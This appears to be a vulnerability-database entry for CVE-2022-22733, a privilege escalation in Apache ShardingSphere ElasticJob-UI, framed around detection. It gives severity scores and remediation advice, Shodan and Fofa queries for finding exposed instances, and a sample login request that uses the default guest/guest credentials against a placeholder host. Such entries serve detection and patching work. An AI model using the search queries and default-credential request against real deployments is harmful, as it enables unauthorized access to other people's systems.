🔙 목록으로 돌아가기

CVE-2022-22733: Apache ShardingSphere ElasticJob-UI privilege escalation

TitleApache ShardingSphere ElasticJob-UI privilege escalation
AuthorZeyad Azima
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could result in unauthorized access and control of the ElasticJob-UI application.
RemediationApply the latest security patches or updates provided by Apache ShardingSphere to mitigate the privilege escalation vulnerability.
CVSS Score6.5
EPSS Score0.86064
CVE IDCVE-2022-22733
CWE IDCWE-200
Shodan Queryhttp.favicon.hash:816588900
Fofa Queryicon_hash=816588900
Tags cve2022 cve exposure sharingsphere apache vuln

🔍 Vulnerability Description

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.

🌐 HTTP Request

POST /api/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Content-Length: 39
Accept: application/json, text/plain, */*
Access-Token:
Content-Type: application/json;charset=UTF-8
Origin: /
Referer: /
Accept-Encoding: gzip

{"username":"guest","password":"guest"}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-22733.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-22733.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A